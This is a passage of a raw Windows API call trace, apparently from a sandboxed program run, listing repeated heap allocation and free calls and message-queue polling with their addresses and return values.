[0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ec0 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6860 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68f0 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67e8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6938 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6968 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c50 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ba8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d10 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d40 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6bd8 | out: hHeap=0x12c0000) returned 1 [0136.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6da0 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ce0 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6cb0 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ad0 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c98 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d70 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6cf8 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d58 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b60 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6bc0 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c08 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b78 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b48 | out: hHeap=0x12c0000) returned 1 [0136.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6bf0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b90 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132d020 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0136.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0070 | out: hHeap=0x12c0000) returned 1 [0136.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efef0 [0136.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1314ca0 | out: hHeap=0x12c0000) returned 1 [0136.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.955] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.955] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300298 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e30 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0136.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0136.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300298 | out: hHeap=0x12c0000) returned 1 [0136.956] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0136.956] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0136.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0136.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe90 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd20 [0136.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0136.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0136.958] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0136.958] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0136.959] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0136.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0136.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0136.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0136.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0136.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0136.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0136.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0136.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0136.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0136.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0136.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0136.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe90 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0136.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0136.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe90 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0136.967] PeekMessageW (in: 